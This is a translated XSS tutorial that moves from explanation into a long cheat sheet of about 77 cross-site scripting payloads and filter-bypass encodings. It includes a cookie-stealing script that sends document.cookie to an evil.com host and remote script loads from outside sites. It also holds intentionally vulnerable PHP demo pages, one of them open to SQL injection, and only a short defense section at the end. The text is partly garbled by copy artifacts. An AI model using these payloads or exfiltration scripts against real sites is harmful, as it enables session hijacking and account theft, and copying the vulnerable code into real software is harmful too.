XSS understood from the principle of zero foundation of network security

01. The principle and classification of XSS

Cross-site scripting attack XSS (Cross Site Scripting), in order not to be confused with the abbreviation of Cascading Style Sheets (CSS)

Therefore, cross-site scripting attacks are abbreviated as XSS. Malicious attackers insert malicious script codes into Web pages. When users browse the pages, the script codes embedded in the Web pages will be executed, thereby achieving the purpose of maliciously attacking users. XSS attacks target is a user-level attack;

XSS is divided into: storage type, reflection type, DOM type XSS

Stored XSS: Stored XSS, persistence, code is stored in the server, such as in personal information or published articles, insert code, if there is no filtering or filtering is not strict, then these codes will be stored in the database, user access When the page starts code execution, this kind of XSS is more dangerous, and it is easy to cause worms and steal cookies;

Reflective XSS: non-persistent, need to deceive users to click on the link to trigger XSS code (there is no such page and content in the server), generally easy to appear on the search page, most of the reflective XSS is used to steal the user's Cookie information;

DOM-type XSS: Without going through the backend, the DOM-XSS vulnerability is a vulnerability based on the Document Object Model (DOM). DOM-XSS is triggered by using the url input parameters to get the control, and it is actually a reflection type. Detailed explanation of XSS, DOM: DOM Document Object Model;

【Help safe learning one by one, where all resources can be obtained one by one】

①Network security learning route

②20 penetration testing e-books

③Security offense and defense 357 pages of notes

④50 security offensive and defensive interview guides

⑤Security Red Team Penetration Toolkit

⑥ Necessary Books on Network Security

⑦100 actual combat cases of vulnerabilities

⑧Internal video resources of major security factories

⑨Analysis of past CTF capture the flag questions

Attributes that may trigger DOM-style XSS

document.refererwindow.namelocationinnerHTMLdocumen.write

02. The dangers of XSS attacks

1. Steal various user accounts, such as machine login accounts, user online banking accounts, and various administrator accounts; 2. Control enterprise data, including the ability to read, tamper, add, and delete enterprise sensitive data; 3. Steal enterprise Important information with commercial value; 4. Illegal transfer of funds; 5. Forced sending of emails; 6. Hosting of websites; 7. Controlling victims’ machines to attack other websites;

03. XSS test statement

When checking whether there is an XSS vulnerability in the website, you should enter some tags, such as <, >, and check whether the source code of the webpage is filtered after inputting. If there is no filter, there is a high probability that there is an XSS vulnerability.

Commonly used test statements:<h5>1</h5>

<span>1</span>

It can be seen that the website does not filter the tags;<script>console.log(1);</script>

It can be seen that there is no pop-up, but 1 is output on the console, we can be sure that there is indeed XSS;

Closure problem: Many times, when testing XSS, we want to consider the closure problem. We first look at the source code of the web page, and we need to first judge whether the website is closed with single quotes or double quotes;

"><span>x</span><"

'><span>x</span><'

Single line comment:

"><span>x</span>//#Double slash means to comment out the following statement

0x04, XSS attack statement

Input detection determines that the tag is not filtered. In order to show the existence of the vulnerability, XSS attack code needs to be inserted;

<script>alert(1)</script><svg onload=alert(1)><a href=javascript:alert(1)><a href='javascript:alert(1)'>aa</a>

copy code

(1) Ordinary XSS JavaScript injection <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(2) IMG tag XSS using JavaScript commands <IMG SRC=http://3w.org/XSS/xss.js/>(3) IMG tags without semicolons and quotes <IMG SRC=javascript:alert('XSS')>(4) IMG tags are case insensitive<IMG SRC=JaVaScRiPt:alert('XSS')> (5) HTML encoding (semicolons are required) <IMG SRC=javascript:alert("XSS")>(6) Bug correction IMG tag <IMG """><SCRIPT>alert("XSS")</SCRIPT>">(7) formCharCode tag (calculator) <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>(8) Unicode encoding of UTF-8 (calculator) <IMG SRC=jav..省略..S')>(9) Unicode encoding of 7-bit UTF-8 has no semicolon (calculator) <IMG SRC=jav..省略..S')>(10) Hex encoding is also without semicolon (calculator) <IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>(11) Embedded tags, separate Javascript <IMG SRC="jav ascript:alert('XSS');">(12) Embedded encoding tags, separate Javascript <IMG SRC="jav ascript:alert('XSS');">(13) Embedded newline <IMG SRC="jav ascript:alert('XSS');">(14) Embedded carriage return <IMG SRC="jav ascript:alert('XSS');">(15 ) Embedded multi-line injection of JavaScript, which is an extreme example of XSS <IMG SRC="javascript:alert('XSS')">(16) Solving restricted characters (requiring the same page)

<script>z='document.'</script><script>z=z+'write("'</script><script>z=z+'<script'</script><script>z=z+'src=ht'</script><script>z=z+'tp://ww'</script><script>z=z+'w.shell'</script><script>z=z+'.net/1.'</script><script>z=z+'js></sc'</script><script>z=z+'ript>")'</script><script>eval_r(z)</script>

copy code

(17) Null character 12-7-1 T00LS - Powered by Discuz! Board https://www.a.com/viewthread.php?action=printable&tid=15267 2/6perl-e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out(18) Null character 2, the null character basically has no effect in China. Because there is no place to use perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out(19) IMG tags before Spaces and meta <IMG SRC=" javascript:alert('XSS');">(20) Non-alpha-non-digit XSS <SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>(21)Non-alpha-non-digit XSS to 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

copy code

(22) Non-alpha-non-digit XSS to 3 <SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>(23) Double open brackets <<SCRIPT>alert("XSS");//<</SCRIPT>(24) No end script tag (only browsers such as Firefox) <SCRIPT SRChttp://3w.org/XSS/xss.js?<B>(25) No end script tag 2 <SCRIPT SRC=//3w.org/XSS/xss.js>(26) Half-open HTML/JavaScript XSS <IMG SRC="javascript:alert('XSS')"(27) Double open angle brackets <iframe src=http://3w.org/XSS.html <(28) No single quotes double quotes semicolon <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>(29) Escape filtered JavaScript \";alert('XSS');//(30) End Title tag ( </TITLE><SCRIPT>alert("XSS");</SCRIPT>31) Input Image <INPUT SRC="javascript:alert('XSS');">(32) BODY Image <BODY BACKGROUND="javascript:alert('XSS')">(33) BODY tag <BODY('XSS')>(34) IMG Dynsrc <IMG DYNSRC="javascript:alert('XSS')">(35)IMG Lowsrc <IMG LOWSRC="javascript:alert('XSS')">(36)BGSOUND <BGSOUND SRC="javascript:alert('XSS');">(37)STYLE sheet <LINK REL="stylesheet" HREF="javascript:alert('XSS');">(38)Remote style sheet (39 <LINK REL="stylesheet" HREF="http://3w.org/xss.css">)List-style-image (list type) <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE<UL><LI>XSS(40)IMG VBscript <IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS(41)META link url <META HTTP-EQUIV="refresh" CONTENT="0;URL=http://URL=javascript:alert('XSS');">(42)Iframe <IFRAME SRC="javascript:alert('XSS');"></IFRAME>(43) frame

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>12-7-1 T00LS - Powered by Discuz!Boardhttps://www.a.com/viewthread.php?action=printable&tid=15267 3/6

copy code

(44)Table <TABLE BACKGROUND="javascript:alert('XSS')">(45)TD <TABLE><TD BACKGROUND="javascript:alert('XSS')">(46)DIV background-image <DIV STYLE="background-image: url(javascript:alert('XSS'))">(47)Add extra characters after DIV background-image(1-32&34&39&160&8192-8&13&12288&65279) **<DIV STYLE="background-image: url(javascript:alert('XSS'))"> ** (48)DIV expression <DIV STYLE="width: expression_r(alert('XSS'));">(49)STYLE attribute split expression <IMG STYLE="xss:expression_r(alert('XSS'))">(50)Anonymous STYLE (composition: Open angle and a letter at the beginning) <XSS STYLE="xss:expression_r(alert('XSS'))">(51)STYLE background-image <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><ACLASS=XSS></A>(52)IMG STYLE way exppression(alert("XSS"))'>(53)STYLE background

<STYLE><STYLEtype="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>(54)BASE<BASE HREF="javascript:alert('XSS');//">

copy code

(55) EMBED tag, you can embed FLASH, which contains XSS <EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>(56) Use ActionScrpt in flash to mix your XSS code a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval_r(a+b+c+d);(57) XML namespace.HTC file must be on the same server as your XSS carrier <HTML xmlns:xss><?import namespace="xss"implementation="http://3w.org/XSS/xss.htc"><xss:xss>XSS</xss:xss></HTML>(58) ) If your JS is filtered, you can add JS code in the picture to use <SCRIPT SRC=""></SCRIPT>(59) IMG embedded command, you can execute any command <IMG SRC="http://www.a.com/a.php?a=b">(60) IMG embedded command (a.jpg on the same server) Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser(61) Filter around symbols ( <SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>62) <SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>(63) <SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>(64) <SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>(65)<SCRIPT a= > SRC="http://3w.org/xss.js"></SCRIPT>(66)

12-7-1 T00LS - Powered by Discuz! Boardhttps://www.a.com/viewthread.php?action=printable&tid=15267 4/6<SCRIPT a=">'>"SRC="http://3w.org/xss.js"></SCRIPT>

copy code

(67)

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

copy code

(68) URL Bypass <A HREF="http://127.0.0.1/">XSS</A>(69) URL Encoding <A HREF="http://3w.org">XSS</A>(70) IP Decimal <A HREF="http://3232235521″>XSS</A>(71) IP Hex ( <A HREF="http://0xc0.0xa8.0×00.0×01″>XSS</A>72) IP Octal <A HREF="http://0300.0250.0000.0001″>XSS</A>(73) Mixed Encoding <A HREF="http://6 6.000146.0×7.147/"">XSS</A>(74) Save[http:] <A HREF="//www.google.com/">XSS</A>(75) Save[www] <A HREF="http://google.com/">XSS</A>( 76) Absolute point absolute DNS <A HREF="http://www.google.com./">XSS</A>(77) javascript link<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

The attack statement of each label;

<script>alert("hack")</script>   #弹出hack<script>alert(/hack/)</script>   #弹出hack<script>alert(1)</script>        #弹出1，对于数字可以不用引号<script>alert(document.cookie)</script>      #弹出cookie<script src=http://xxx.com/xss.js></script>  #引用外部的xss

copy code

svg tag:

<svg onload="alert(1)"><svg onload="alert(1)"//

copy code

Label:

<img  src=1  οnerrοr=alert("hack")><img  src=1  οnerrοr=alert(document.cookie)>  #弹出cookie

copy code

Label:

<body οnlοad=alert(1)><body οnpageshοw=alert(1)>

copy code

video tag:

<video οnlοadstart=alert(1) src="/media/hack-the-planet.mp4" />

copy code

style tag:

<style οnlοad=alert(1)></style>

copy code

05. XSS vulnerability mining

5.1. Black box testing

Try to find everything that is user-controllable and can be output in the page code, such as the following:

• Every parameter of the URL

• the URL itself

• form

• search bar

5.2. Common business scenarios

• Hardest-hit areas: comment area, message area, personal information, order information, etc.

• Targeted type: In-site messages, web instant messaging, private messages, feedback

• There are risks: search box, current directory, image attributes, etc.;

5.3. White box audit

The code audit about XSS mainly starts from the place where the parameters are received and some key points;

Common methods of receiving parameters in PHP include G​ET, _POST, $_REQUEST, etc. You can search for all methods of receiving parameters, and then track the received data to see if it is output to the page, and then look at the output Whether the data in the page has been processed by filtering and html encoding

You can also search for output statements like echo, track where the output variables come from, whether we can control it, if it is obtained from the database, whether we can control the data stored in the database, whether it is filtered before saving it in the database, etc. ;

Most programs will uniformly call the functions that receive parameters encapsulated in public files, and we need to audit these public functions to see if there is filtering, whether they can be bypassed, etc.;

Similarly, to audit DOM type injection, you can search for some js keywords to operate DOM elements for auditing;

06. XSS attack process

6.1. Reflected XSS vulnerability:

1. Alice often browses a certain website, which is owned by Bob. Bob's website requires Alice to log in with a user name and password, and stores Ailce's sensitive information (such as bank accounts);

2. Tom finds that there is a reflected XSS vulnerability in Bob's site;

3. Tom uses the reflected XSS vulnerability of Bob's website to write an exploit, make it into a link, and use various means to induce Alice to click

4. After logging in to Bob's site, Alice browses the malicious link provided by Tom;

5. The malicious script embedded in the malicious link is executed in Alice's browser. This script steals sensitive information (cookie, account number, etc.), and then sends the information to Tom without Alice's knowledge;

6. Tom can use the acquired Cookie to log in to Bob's site with Alice's identity information. If the script is more powerful, Tom can also control Alice's browser and further use the vulnerability control;

6.2. Stored XSS vulnerability:

1. Bob owns a Web site that allows users to publish information and browse published information;

2. Tom detects that Bob's site has a stored XSS vulnerability;

3. Tom publishes a hotspot information with a malicious script on Bob's website, which is stored in the database of Bob's server, and then attracts other users to read the hotspot information;

4. After Bob or any other person, such as Alice, browses the information, Tom's malicious script will be executed;

5. After Tom's malicious script is executed, Tom can launch an XSS attack on the users of the browser page;

07. XSS attack test

7.1, remote loading attack payload

XSS vulnerabilities can realize many functions by constructing malicious XSS statements. For common use, construct XSS malicious code to obtain the cookie of the other party's browser;

1) We first save the malicious code in the local kali, and in actual combat, we save the code on our server;

var img=document.createElement("img");img.src="http://www.evil.com/log?"+escape(document.cookie);document.body.appendChild(img);

copy code

2) We are in kali, use python to open http service;

python -m http.server 80

3) We remotely load our malicious code where there is an XSS vulnerability:<script src="http://192.168.61.128/xss.js"></script>

Seeing that the browser is loaded, our xss malicious code;

4) Successfully obtained the cookie information

5) Image to create a link

<img src=''onerror=document.body.appendChild(document.createElement('script')).src='//192.168.0.110/xss.js'>

copy code

6) Character splicing

This is generally used when the input characters are limited.

<script>z='document.'</script><script>z=z+'write("'</script><script>z=z+'<script'</script><script>z=z+' src=ht'</script><script>z=z+'tp://www.'</script><script>z=z+'xsstools'</script><script>z=z+'.com/a'</script><script>z=z+'mER></sc'</script><script>z=z+'ript>")'</script><script>eval(z)</script>有的情况要用/**/注释不需要的代码。

copy code

7) jQuery loading

<script>$.getScript("//www.xsstools.com/amER");</script>

copy code

7.2. Reflected XSS:

//前端 1.html：<html><head lang="en">    <meta charset="UTF-8">    <title>反射型XSS</title></head><body>    <form action="action.php" method="post">        <input type="text" name="name" />        <input type="submit" value="提交">    </form></body></html>
//后端 action.php：<?php    $name=$_POST["name"];   echo $name;?>

copy code

We then enter in the input box:<script>alert(/xss/)</script>

The xss page pops up directly on the page. You can see that the statement we inserted has been executed by the page. This is the most basic reflective XSS vulnerability. This vulnerability flows to: front-end --> back-end --> front-end

7.3. Stored XSS:

//前端：2.html<html><head lang="en">    <meta charset="UTF-8">    <title>存储型XSS</title></head><body>    <form action="action2.php" method="post">        输入你的ID：<input type="text" name="id" /> <br/>        输入你的Name：<input type="text" name="name" /> <br/>        <input type="submit" value="提交">    </form></body></html>//后端：action2.php<?php  $id=$_POST["id"];  $name=$_POST["name"];  mysql_connect("localhost","root","root");  mysql_select_db("test");
  $sql="insert into xss value ($id,'$name')";  $result=mysql_query($sql);?>//供其他用户访问页面：show2.php<?php  mysql_connect("localhost","root","root");  mysql_select_db("test");  $sql="select * from xss where id=1";  $result=mysql_query($sql);  while($row=mysql_fetch_array($result)){
   
       echo $row['name'];  }?>

copy code

Here is a page submitted by a user. After the data is submitted to the backend, the backend stores it in the database. Then when other users visit another page, the backend calls up the data and displays it to another user, and the XSS code is executed. up;

We enter 3 and <script>alert(/xss/)</script>, next, we look at the database;

As you can see, our XSS statement has been inserted into the database;

Then when other users visit the show2.php page, the XSS code we inserted is executed;

The data flow direction of stored XSS is: front-end --> back-end --> database --> back-end --> front-end

7.4. DOM type XSS

Put the source code first:

// 前端3.html<html>  <head lang="en">  <meta charset="UTF-8">  <title>DOM型XSS</title>  </head>  <body>  <form action="action3.php" method="post">  <input type="text" name="name" />  <input type="submit" value="提交">  </form>  </body>  </html>  // 后端action3.php  <?php  $name=$_POST["name"];?><input id="text" type="text" value="<?php echo $name; ?>"/><div id="print"></div><script type="text/javascript">  var text=document.getElementById("text");  var print=document.getElementById("print");  print.innerHTML=text.value;  // 获取 text的值，并且输出在print内。这里是导致xss的主要原因。</script>

copy code

There is a submission page here, where users can submit data, and after the data is submitted, it will be processed in the background;

We can enter <img src=1 οnerrοr=alert('hack')>, and then see the changes on the page;

The page directly pops up the hack page, and the statement we inserted has been executed by the page;

This is the vulnerability of DOM-type XSS. The data flow direction of this vulnerability is: front-end --> browser

08. XSS encoding bypass

8.1, gpc filter characters

If gpc is turned on, special characters will be added with slashes, that is, 'become', do not use single quotes and double quotes for xss attack codes;

Bypass gpc is not available by default in the higher version of php, but developers will use addcslashes() to escape special characters; <script src='http://www.xss123.com/JGdbsl?1623638390'></script>this cannot be executed <script src=http://www.xss123.com/JGdbsl?1623638390></script>without single quotes

8.2, filter alert

When the page filters the alert function, because this function will pop up, not only many programs will filter it, but also many wafs will intercept it, so there is no alert;

<script>prompt(/xss/);</script><script>confirm(1);</script><script src=http://www.xss123.com/eciAKJ?1623635663></script>

copy code

8.3. Filter tags

If html entity filtering is used in the program, htmlspecialchars() will be used to materialize the input characters in php, and the characters after materialization will not be executed in html, and the predefined characters "<" (less than) and "> "(greater than) is converted into an HTML entity, and most of the xss malicious codes must use < or >. After these two characters are materialized, they cannot be executed in HTML;

The predefined characters are:

& (ampersand) becomes &

" (double quotes) become "

' (single quote) becomes '

< (less than) becomes <

· > (greater than) becomes >

But in the input tags, there is no need to consider the tag entity, because the two tags <> are not used,

<input type="text" name="username" value="" onclick="javascript:alert('xss');"/>

8.4, ascii encoding

<script>alert(String.fromCharCode(88,83,83))</script>

8.5, url encoding

<a href="javascript:%61%6c%65%72%74%28%32%29">123</a>

8.6. JS coding

Coding Express: https://www.jb51.net/tools/zhuanhuan.htm

Octal encoding:<script>eval("\141\154\145\162\164\50\61\51");</script>

Hexadecimal encoding<script>eval("\x61\x6c\x65\x72\x74\x28\x31\x29")</script>

jsunicode encoding<script>\u0061\u006c\u0065\u0072\u0074('xss');</script>

8.7. HTML encoding

HTML encoding can be parsed after =

Decimal:<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;" /><button onclick="confirm('7&#39;);">Button</button>

hexadecimal

'<img src="x" onerror="&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"/>'

copy code

8.8, base64 encoding

Use pseudo-protocol base64 decoding to execute xss

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">111</a><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>

copy code

0x09, XSS defense

The general idea of ​​XSS defense is: filter the user's input (and URL parameters), and html-encode the output, that is, filter all the content submitted by the user, and filter the parameters in the url. Filtering out will cause the script to execute , and then html-encode the content that is dynamically output to the page, so that the script cannot be executed in the browser;

Filtering the input content can be divided into blacklist and whitelist filtering. Although blacklist filtering can block most XSS attacks, there is still a risk of being bypassed. Although whitelist filtering can basically eliminate XSS attacks, the real Such strict whitelist filtering is generally not possible in the environment;

To html-encode the output is to html-encode the user's input data through a function so that it cannot be run as a script;

The following is to use the htmlspecialchars function in php to html-encode the name parameter input by the user and convert it into an html entity;

#使用htmlspecialchars函数对用户输入的name参数进行html编码，将其转换为html实体$name = htmlspecialchars( $_GET[ 'name' ] );

copy code

We can also set the HTTP Only attribute of the session cookie on the server side, so that the JS script on the client side cannot obtain the cookie information;